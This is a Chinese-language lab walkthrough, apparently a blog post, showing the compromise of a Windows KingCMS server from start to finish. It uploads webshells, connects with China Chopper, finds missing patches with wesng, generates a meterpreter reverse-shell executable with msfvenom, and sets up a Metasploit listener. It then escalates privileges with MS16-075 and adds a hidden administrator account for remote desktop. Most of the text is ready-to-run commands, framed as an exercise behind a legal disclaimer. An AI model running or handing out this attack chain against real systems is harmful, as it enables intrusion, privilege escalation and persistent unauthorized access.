免責聲明
請勿利用文章內的相關技術從事非法測試,由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任。工具來自網絡,安全性自測,如有侵權請聯系刪除。
原理圖

先在被攻擊機中上傳小馬文件,然后用菜刀連接被上傳木馬的機器

上傳大馬文件

用本機連接大馬

用大馬生成文件:systeminfo > C:\www\KingCMS\q.txt

使用wesng進行補丁篩選(python wes.py .txt -o vuln.csv)

連接云服務器,并下載msf:curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

生成反彈shell的exe文件,IP為使用msf的主機的ip,監聽端口為5555,通過菜刀上傳到win server(msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=5555 -f exe > q.exe)

安裝rz和sz命令(yum install lrzsz)

輸入sz q.exe,將.exe文件下載至本機

運行msf :msfconsole;
msf設置端口監聽(use /exploit/multi/handler>)
設置payload(set payload windows/meterpreter/reverse_tcp)
查看配置(show options)
設置監聽端口(set lport 5555)
設置監聽ip,全部監聽(set lhost 0.0.0.0)
最后執行開始監聽(exploit)

菜刀中執行exe文件,打開虛擬終端即可執行

getuid(查看用戶);background(保存會話退出)

msf提權
MSF設置payload (ms16-075)
search ms16-075
use 1
set payload windows/x64/meterpreter/reverse_tcp
設置會話session,看剛剛掛起是session的編號 (set session 2)
設置payload參數(端口換個6666,lhost換成攻擊機的IP)
exploit執行,成功即為提權成功



輸入shell,進行如下操作:
net user username password /add 創建用戶
net localgroup "Remote Desktop Users" username /add 將創建的用戶添加到遠程連接組
net localgroup Administrators username /add 將創建的用戶添加到管理員組
然后即可通過遠程登錄進入
本機進行遠程連接


至此實驗成功!
中國信息安全
聚銘網絡
奇安信集團
中國信息安全
安全內參
安全圈
聚銘網絡
商密君
中國信通院CAICT
深圳市網絡與信息安全行業協會
LemonSec
看雪學苑